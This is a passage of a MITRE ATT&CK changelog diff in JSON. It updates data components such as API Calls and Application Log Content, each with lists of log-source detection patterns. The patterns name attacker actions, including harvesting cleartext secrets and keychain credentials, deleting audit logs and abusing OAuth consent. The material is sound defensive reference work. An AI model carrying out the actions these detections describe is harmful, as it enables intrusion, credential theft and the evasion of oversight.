+                            "description": "CISA, et al. (2023, December 7). Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. Retrieved June 13, 2024.",
+                            "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a"
+                        },
+                        {
+                            "source_name": "Microsoft Star Blizzard August 2022",
+                            "description": "Microsoft Threat Intelligence. (2022, August 15). Disrupting SEABORGIUM\u2019s ongoing phishing operations. Retrieved June 13, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/"
+                        },
+                        {
+                            "source_name": "StarBlizzard",
+                            "description": "Microsoft Threat Intelligence. (2023, December 7). Star Blizzard increases sophistication and evasion in ongoing attacks. Retrieved February 13, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/"
+                        },
+                        {
+                            "source_name": "Google TAG COLDRIVER January 2024",
+                            "description": "Shields, W. (2024, January 18). Russian threat group COLDRIVER expands its targeting of Western officials to include the use of malware. Retrieved June 13, 2024.",
+                            "url": "https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Aung Kyaw Min Naing, @Nolan"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-10-22 22:12:56.172000+00:00\"}}}",
+                    "previous_version": "2.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "campaigns": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "assets": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "mitigations": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "datasources": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "datacomponents": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-13 19:59:14.491000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0112",
+                            "external_id": "DC0112"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "API Calls",
+                    "description": "API calls utilized by an application that could indicate malicious activity",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated sandbox or policy violations by a single process or app bundle (for example, deny rules) followed by successful access to resources or APIs that normally require higher privileges"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "mmap with PROT_EXEC and PROT_WRITE by sandboxed app"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "SELinux AVC related to execute_no_trans/execmem after decode/unpack activity by the same app UID"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-01-16 16:18:01.897000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0112\", \"old_value\": \"https://attack.mitre.org/data-components/DC0112\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--613788f2-ad72-43f5-b5f7-a93e2adc70fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-29 14:59:30.164000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0119",
+                            "external_id": "DC0119"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Application Assets",
+                    "description": "Application Assets represent static or packaged resources bundled with an application that may contain executable logic, configuration data, or hidden payloads.\n\nThese assets may include embedded binaries, scripts, configuration files, libraries, or other resources stored within the application package. Adversaries may hide malicious components within application assets to evade detection during installation or initial inspection.\n\nExamples\n\nAndroid:\n\n- Embedded .dex files loaded dynamically\n- Hidden native libraries in APK assets\n- Dropped payloads stored within the app sandbox\n\niOS:\n\n- Embedded frameworks\n- Configuration files within the application bundle\n- Hidden scripts or secondary binaries packaged with the app\n\nCollection Methods\n- Mobile EDR application inspection\n- Static application analysis\n- Application package scanning during install or sideload events\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application gaining or using unexpected background execution entitlements or modes"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-03-11 15:49:22.334000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0119\", \"old_value\": \"https://attack.mitre.org/data-components/DC0119\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.776000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0038",
+                            "external_id": "DC0038"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Application Log Content",
+                    "description": "Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples: \n\n- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).\n- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).\n- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.\n- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.\n- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME active imeId=<pkg>; frequent onStartInput/commitText calls"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Task switch from browser/custom tab to handler immediately after OAuth return"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background"
+                        },
+                        {
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "smtpd$.*$: .*from=[.*@internaldomain.com](mailto:.*@internaldomain.com) to=[.*@internaldomain.com](mailto:.*@internaldomain.com)"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound messages with anomalous headers, spoofed SPF/DKIM failures"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound emails containing hyperlinks from suspicious sources"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound email attachments logged from MTAs with suspicious metadata"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Mismatch between authenticated username and From header in email"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "High-frequency inbound mail activity to a specific recipient address"
+                        },
+                        {
+                            "name": "ApplicationLog:API",
+                            "channel": "Docker/Kubernetes API access from external sources"
+                        },
+                        {
+                            "name": "ApplicationLog:CallRecords",
+                            "channel": "Outbound or inbound calls to high-risk or blocklisted numbers"
+                        },
+                        {
+                            "name": "ApplicationLog:EntraIDPortal",
+                            "channel": "DeviceRegistration events"
+                        },
+                        {
+                            "name": "ApplicationLog:IIS",
+                            "channel": "IIS W3C logs in C:\\inetpub\\logs\\LogFiles\\W3SVC* (spikes in 5xx, RCE/SQLi/path traversal/JNDI patterns)"
+                        },
+                        {
+                            "name": "ApplicationLog:Ingress",
+                            "channel": "Kubernetes NGINX/Envoy ingress controller logs with anomalous payloads and 5xx spikes"
+                        },
+                        {
+                            "name": "ApplicationLog:Intune/MDM Logs",
+                            "channel": "Enrollment events (e.g., MDMDeviceRegistration)"
+                        },
+                        {
+                            "name": "ApplicationLog:MailServer",
+                            "channel": "Unexpected additions of sieve rules or filtering directives"
+                        },
+                        {
+                            "name": "ApplicationLog:Outlook",
+                            "channel": "Outlook client-level rule creation actions not consistent with normal user activity"
+                        },
+                        {
+                            "name": "ApplicationLog:WebServer",
+                            "channel": "/var/log/httpd/access_log, /var/log/apache2/access.log, /var/log/nginx/access.log with exploit indicators and burst errors"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SendEmail"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeModel"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeFunction: Unexpected or repeated invocation of functions not tied to known workflows"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "CreateUser|AttachRolePolicy|CreateAccessKey|UpdateAssumeRolePolicy|CreateLoginProfile"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "StopLogging, DeleteTrail, UpdateTrail: API calls that disable or modify logging services"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Repeated crash pattern within container or instance logs"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Elevated 5xx response rates in application logs or gateway layer"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "Add role assignment / ElevateAccess / Create service principal"
+                        },
+                        {
+                            "name": "azure:audit",
+                            "channel": "App registrations or consent grants by abnormal users or at unusual times"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "ConsentGrant: Suspicious consent grants to non-approved or unknown applications"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Modify Conditional Access Policy"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Register PTA Agent or Modify AD FS trust"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Resource access initiated using application credentials, not user accounts"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "container_create,container_start"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "Container exited with non-zero code repeatedly in short period"
+                        },
+                        {
+                            "name": "docker:runtime",
+                            "channel": "execution of cloud CLI tool (e.g., aws, az) inside container"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "ThreatDetected, QuarantineLog"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "ThreatLog"
+                        },
+                        {
+                            "name": "esxi:esxupdate",
+                            "channel": "/var/log/esxupdate.log contains VIB installed with `--force` or `--no-sig-check` and non-standard acceptance levels"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log anomalies (faults, crashes, restarts) around inbound connections"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Keywords: 'Backtrace','Signal 11','PANIC','hostd restarted','assert' or 'Service terminated unexpectedly' in /var/log/hostd.log, /var/log/vmkernel.log, /var/log/syslog.log."
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "unexpected script/command invocations via hostd"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Guest Operations API invocation: StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, InitiateFileTransferFromGuest"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "unexpected script invocations producing long encoded strings"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Host daemon command log entries related to vib enumeration"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "New extension/module install with unknown vendor ID"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "vmkernel / OpenSLP logs for malformed requests"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "Symmetric crypto routines triggered for external session"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi process initiating asymmetric handshake with external host"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "SendAs: Outbound messages with alias identities that differ from primary account"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Secure text entry focus and editingChanged bursts not typical for the app"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated canOpenURL checks across diverse schemes (\u2265N within short window)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)"
+                        },
+                        {
+                            "name": "journald:Application",
+                            "channel": "Segfault or crash log entry associated with specific application binary"
+                        },
+                        {
+                            "name": "journald:systemd",
+                            "channel": "Repeated service restart attempts or unit failures"
+                        },
+                        {
+                            "name": "kubernetes:orchestrator",
+                            "channel": "Access to orchestrator logs containing credentials (Docker/Kubernetes logs)"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "cleared or truncated .bash_history"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "usb * new|thunderbolt|pci .* added|block.*: new .* device"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Inbound messages from webmail services containing attachments or URLs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel|systemd messages indicating 'segmentation fault'|'core dumped'|'service terminated unexpectedly' for sshd, smbd, vsftpd, mysqld, httpd, etc."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "System daemons initiating encrypted sessions with unexpected destinations"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "milter configuration updated, transport rule initialized, unexpected script execution"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Repetitive HTTP 408, 500, or 503 errors logged within short timeframe"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Application or browser logs (webview errors, plugin enumerations) indicating suspicious script evaluation or plugin loads"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "processes binding to non-standard ports or sshd configured on unexpected port"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "system daemons initiating TLS sessions outside expected services"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "browser/office crash, segfault, abnormal termination"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Error/warning logs from services indicating load spike or worker exhaustion"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched from_domain vs return_path_domain"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "suspicious DHCP lease assignment with unexpected DNS or gateway"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "opened document|clicked link|segfault|abnormal termination|sandbox"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Authentication attempts into finance-related servers from unusual IPs or times"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd sessions with unusual port forwarding parameters"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Non-standard processes negotiating SSL/TLS key exchanges"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Module registration or stacktrace logs indicating segmentation faults or unknown module errors"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Segfaults, kernel oops, or crashes in security software processes"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Emails containing cleartext secrets (password=, api_key=, token=) shared across internal/external domains"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Transport Rule Modification"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Admin Audit Logs, Transport Rules"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "MailDelivery: High-frequency delivery of messages or attachments to a single recipient"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "New-InboxRule: Automation that triggers abnormal forwarding or external link generation"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "MessageTrace logs"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "External sender message followed by user action involving links or attachments"
+                        },
+                        {
+                            "name": "m365:mailboxaudit",
+                            "channel": "Outlook rule creation or custom form deployment"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "AuthenticationDetails=fail OR SPF=fail OR DKIM=fail OR DMARC=fail"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "X-MS-Exchange-Organization-AutoForwarded"
+                        },
+                        {
+                            "name": "m365:purview",
+                            "channel": "MailItemsAccessed & Exchange Audit"
+                        },
+                        {
+                            "name": "m365:purview",
+                            "channel": "MailItemsAccessed, Search-Mailbox events"
+                        },
+                        {
+                            "name": "m365:teams",
+                            "channel": "External chat request or new tenant communication preceding approval activity"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Unusual form activity within Outlook client, including load of non-default forms"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf, MessageSend, ClickThrough, MailItemsAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf, MessageSend, AttachmentPreviewed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Emails with suspicious sender domains, spoofed headers, or anomalous attachment types"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed: Access of email attachments by Office applications"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Creation or modification of inbox rule outside of normal user behavior"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Inbound emails containing embedded or shortened URLs"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "AppRegistration: Unexpected application registration or OAuth authorization"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MessageSend, MessageRead, or FileAttached events containing credential-like patterns"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, Add-InboxRule, RegisterWebhook"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "ConsentGranted: Abuse of application integrations to mint tokens bypassing MFA"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Application Consent grants, new OAuth client registrations, or unusual admin-level activities executed by a user account shortly after suspected drive-by compromise"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Folder configuration updated with external or HTML-formatted Home Page via Set-MailboxFolder"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "PurgeAuditLogs, Remove-MailboxAuditLog"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-CsOnlineUser or UpdateAuthPolicy"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "New-InboxRule or Set-InboxRule events recorded in Exchange Online"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Transport rule or inbox rule creation events"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "GAL Lookup or Address Book download"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Inbound emails with attachments from suspicious or spoofed senders"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "certificate added or modified in application credentials"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Unusual MFA requests or OAuth consent events temporally aligned with user-reported vishing call"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set federation settings on domain|Set domain authentication|Add federated identity provider"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf/SendAs: Emails sent where the sending identity mismatches account ownership"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-MailboxAutoReplyConfiguration: Unexpected rule changes creating impersonated replies"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf/SendAs: Office Suite initiated messages using impersonated identities"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Read-only configuration review from GUI"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Modify Federation Settings or Update Authentication Policy"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Unusual spikes in inbound messages to a single recipient"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "PowerShell: Add-MailboxPermission"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Add-MailboxPermission or Set-ManagementRoleAssignment"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-PartnerOfRecord / CompanyAdministrator role assignments / New-DelegatedAdminRelationship"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Add-DelegatedAdmin, Set-PartnerOfRecord, Add-MailboxPermission, Set-OrganizationRelationship"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MailSend: Outlook messages with suspicious subject/body terms (e.g., urgent payment, wire transfer) targeting finance teams"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed, FileDownloaded, SearchQueried"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Detection of hidden macro streams or SetHiddenAttribute actions"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "RunMacro"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileUploaded or FileCopied events"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "TeamsMessageAccess, TeamsExport, ExternalAppAccess"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "TeamsMessagesAccessedViaEDiscovery, TeamsGraphMessageExport"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "ApplicationModified, ConsentGranted: Unexpected app consent or modification events linked to security evasion"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication"
+                        },
+                        {
+                            "name": "macos:jamf",
+                            "channel": "RemoteCommandExecution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Device attached|enumerated VID/PID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound email activity with suspicious domains or mismatched sender information"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "App/web server logs ingested via unified logging or filebeat (nginx/apache/node)."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Received messages with embedded or shortened URLs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Received messages containing embedded links or attachments from non-enterprise services"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process 'crashed'|'EXC_BAD_ACCESS' for sshd, screensharingd, httpd; launchd restarts of these daemons."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "opendirectoryd crashes or abnormal authentication errors"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Logs from unifiedlogging that show browser crashes, plugin enumerations, extension installs or errors around the same time as suspicious network fetches"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream cleared or truncated"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "quarantine or AV-related subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Repeated process crashes logged by CrashReporter or system instability logs in com.apple.console"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound messages with attachments from suspicious domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outgoing or incoming calls with non-standard caller IDs or unusual metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail.app or third-party clients sending messages with mismatched From headers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process crash, abort, code signing violations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Configuration profile modified or new profile installed"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Crash log entries for a process receiving malformed input or known exploit patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Repetitive inbound email delivery activity logged within a short time window"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Application errors or resource contention from excessive frontend or script invocation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched header vs envelope domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "new DHCP configuration with anomalous DNS or router values"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail or AppleScript subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "opened document|clicked link|EXC_BAD_ACCESS|abort|LSQuarantine"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Anomalous keychain access attempts targeting payment credentials"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Abnormal terminations of com.apple.security.* or 3rd-party security daemons"
+                        },
+                        {
+                            "name": "networkdevice:controlplane",
+                            "channel": "Syslog from edge devices with HTTP 500s on mgmt portal, SmartInstall events, unexpected CLI commands"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config push events"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "SIP REGISTER, INVITE, or unusual call destination metadata"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Failed authentication requests redirected to non-standard portals"
+                        },
+                        {
